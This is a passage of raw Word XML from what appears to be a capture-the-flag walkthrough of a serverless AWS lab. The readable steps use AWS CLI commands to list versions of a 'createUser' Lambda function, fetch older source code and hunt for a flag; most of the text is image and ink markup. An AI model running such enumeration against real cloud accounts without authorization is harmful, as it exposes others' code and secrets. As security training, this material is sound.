                <v:imagedata r:id="rId77"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page15image66364352" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="443D3CD5" wp14:editId="76ACE708">
            <wp:extent cx="5731510" cy="3495675"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="9525"/>
            <wp:docPr id="132" name="Picture 132" descr="page15image6636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15image663643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495675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCCB517" w14:textId="354E2AEB" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="52C43BF3" w14:textId="77777777" w:rsidR="007870F2" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t>The source code reveals that</w:t>
      </w:r>
      <w:r w:rsidR="008A3F2C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> if a user has the invite code which is present in the table "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>InviteCodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">". He/she can create a user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C156F" w14:textId="312AD1ED" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">(The username and password will be added to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>dynamodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> table "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>AllowedUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">" ). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53D92E" w14:textId="77777777" w:rsidR="007870F2" w:rsidRDefault="007870F2" w:rsidP="0094232C"/>
    <w:p w14:paraId="1CDF3A9D" w14:textId="4D3CC4B9" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">However, the ServerlessFLAG3 is not fetched, a TODO note is present which mentions implementing the feature to fetch the ServerlessFLAG3 from S3 bucket. Therefore, even if the function is invoked successfully, the ServerlessFLAG3 will not be returned. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387105FC" w14:textId="77777777" w:rsidR="008A3F2C" w:rsidRPr="0094232C" w:rsidRDefault="008A3F2C" w:rsidP="0094232C"/>
    <w:p w14:paraId="31497B0B" w14:textId="0A126011" w:rsidR="000E7394" w:rsidRDefault="0094232C" w:rsidP="007368E3">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 19: ​Check if another version of the function</w:t>
      </w:r>
      <w:r w:rsidR="000E7394">
        <w:t xml:space="preserve"> – ‘create user’</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43F75C" w14:textId="77777777" w:rsidR="000E7394" w:rsidRDefault="0094232C" w:rsidP="000E7394">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8531B" w14:textId="14E04857" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="000E7394">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aws lambda list-versions-by-function --function-name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>createUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716BD1C" w14:textId="06B86AA9" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="000E7394" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F823F50" wp14:editId="137E3023">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3957840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>716024</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="430920" cy="360"/>
                <wp:effectExtent l="88900" t="139700" r="90170" b="139700"/>
                <wp:wrapNone/>
                <wp:docPr id="251" name="Ink 251"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId79">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="430920" cy="360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="260E2E75" id="Ink 251" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:307.4pt;margin-top:47.9pt;width:42.45pt;height:17.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">
                <v:imagedata r:id="rId80" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FE1EB86" wp14:editId="61A3BCF5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3980880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2829584</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1318320" cy="26640"/>
                <wp:effectExtent l="88900" t="139700" r="91440" b="139065"/>
                <wp:wrapNone/>
                <wp:docPr id="250" name="Ink 250"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId81">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1318320" cy="26640"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="369582E6" id="Ink 250" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:309.25pt;margin-top:214.3pt;width:112.3pt;height:19.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">
                <v:imagedata r:id="rId82" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B8684BA" wp14:editId="650A0CBC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4421880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>649784</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1149120" cy="73800"/>
                <wp:effectExtent l="88900" t="139700" r="83185" b="142240"/>
                <wp:wrapNone/>
                <wp:docPr id="249" name="Ink 249"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId83">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1149120" cy="73800"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3DFA8ACF" id="Ink 249" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:344pt;margin-top:42.65pt;width:99pt;height:22.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">
                <v:imagedata r:id="rId84"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page16image66366640" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D91C128" wp14:editId="2BC104F6">
            <wp:extent cx="5731510" cy="4249420"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17780"/>
            <wp:docPr id="129" name="Picture 129" descr="page16image6636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ge16image663666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4249420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF4EDE" w14:textId="77777777" w:rsidR="00DB2CF2" w:rsidRDefault="0094232C" w:rsidP="00DB2CF2">
      <w:r w:rsidRPr="0094232C">
        <w:t>There are two versions of the lambda function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC1A6C1" w14:textId="5F7F0AD4" w:rsidR="001010C9" w:rsidRDefault="0094232C" w:rsidP="00DB2CF2">
      <w:r w:rsidRPr="0094232C">
        <w:br/>
        <w:t xml:space="preserve">Step 20: ​Get more details about </w:t>
      </w:r>
      <w:r w:rsidR="000E7394">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>createUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E7394">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function version 1. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61A400" w14:textId="354A84D0" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="000E7394">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lambda get-function --function-name createUser:1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8BDC73" w14:textId="77777777" w:rsidR="001010C9" w:rsidRDefault="001010C9" w:rsidP="0094232C"/>
    <w:p w14:paraId="62679F34" w14:textId="579317B2" w:rsidR="000E7394" w:rsidRPr="0094232C" w:rsidRDefault="000E7394" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1035C4AD" wp14:editId="40867DD4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4282560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2935211</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1344960" cy="156960"/>
                <wp:effectExtent l="127000" t="215900" r="115570" b="211455"/>
                <wp:wrapNone/>
                <wp:docPr id="256" name="Ink 256"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId86">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1344960" cy="156960"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="68EC9C4D" id="Ink 256" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:330.1pt;margin-top:216.95pt;width:120.05pt;height:40.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">
                <v:imagedata r:id="rId87" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24F165FD" wp14:editId="6D62D5F7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4537080</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3344891</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1081800" cy="36720"/>
                <wp:effectExtent l="127000" t="215900" r="137795" b="217805"/>
                <wp:wrapNone/>
                <wp:docPr id="255" name="Ink 255"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId88">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1081800" cy="36720"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3C67A6E4" id="Ink 255" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:350.15pt;margin-top:249.25pt;width:99.4pt;height:31.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">
                <v:imagedata r:id="rId89" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08D92C58" wp14:editId="7AFE783C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>114120</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2770691</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4992120" cy="248400"/>
                <wp:effectExtent l="127000" t="215900" r="126365" b="208915"/>
                <wp:wrapNone/>
                <wp:docPr id="254" name="Ink 254"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId90">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4992120" cy="248400"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="403920F8" id="Ink 254" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.95pt;margin-top:204pt;width:407.3pt;height:47.9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">
                <v:imagedata r:id="rId91" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="775EED23" wp14:editId="218F64D3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>97560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3342731</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4266360" cy="24480"/>
                <wp:effectExtent l="127000" t="215900" r="140970" b="217170"/>
                <wp:wrapNone/>
                <wp:docPr id="253" name="Ink 253"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId92">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4266360" cy="24480"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="75AFD1D7" id="Ink 253" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:.6pt;margin-top:249.05pt;width:350.15pt;height:30.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">
                <v:imagedata r:id="rId93" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FF0C87B" wp14:editId="3440674A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>105120</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2540291</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5695200" cy="146880"/>
                <wp:effectExtent l="127000" t="215900" r="147320" b="208915"/>
                <wp:wrapNone/>
                <wp:docPr id="252" name="Ink 252"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId94">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5695200" cy="146880"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1C8EBE4E" id="Ink 252" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1.25pt;margin-top:185.85pt;width:462.65pt;height:39.9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">
                <v:imagedata r:id="rId95"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page17image66369760" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72A81E6B" wp14:editId="30A3C666">
            <wp:extent cx="5731510" cy="3574415"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="6985"/>
            <wp:docPr id="126" name="Picture 126" descr="page17image6636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age17image6636976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574415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FBFE0C" w14:textId="0296101A" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The Link to download the source code is present in the Location Attribute of Code section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F46001" w14:textId="77777777" w:rsidR="000E7394" w:rsidRPr="0094232C" w:rsidRDefault="000E7394" w:rsidP="0094232C"/>
    <w:p w14:paraId="5C6C7DFA" w14:textId="05E4D060" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00075F86">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 21: ​Download the source archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2B6F1" w14:textId="3A4C7B43" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00075F86">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 22: ​Extract the archive and rename the file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D80A6" w14:textId="14A2757E" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00075F86">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 23: ​View index2.js file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5F8EF" w14:textId="77777777" w:rsidR="00075F86" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page19image66374704" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD2F993" wp14:editId="5ED4CB73">
            <wp:extent cx="5731510" cy="3435350"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="19050"/>
            <wp:docPr id="118" name="Picture 118" descr="page19image6637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ge19image6637470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435350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="285D1641" w14:textId="0D794DAC" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="00767960" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01A589F8" wp14:editId="68023607">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1110960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2208095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2542680" cy="34560"/>
                <wp:effectExtent l="63500" t="101600" r="86360" b="105410"/>
                <wp:wrapNone/>
                <wp:docPr id="257" name="Ink 257"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId98">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2542680" cy="34560"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="22E15EA5" id="Ink 257" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:84.7pt;margin-top:168.2pt;width:205.85pt;height:1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">
                <v:imagedata r:id="rId99"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page19image66374496" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67BD691F" wp14:editId="715BD4F9">
            <wp:extent cx="5731510" cy="3627120"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17780"/>
            <wp:docPr id="117" name="Picture 117" descr="page19image663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ge19image663744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627120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
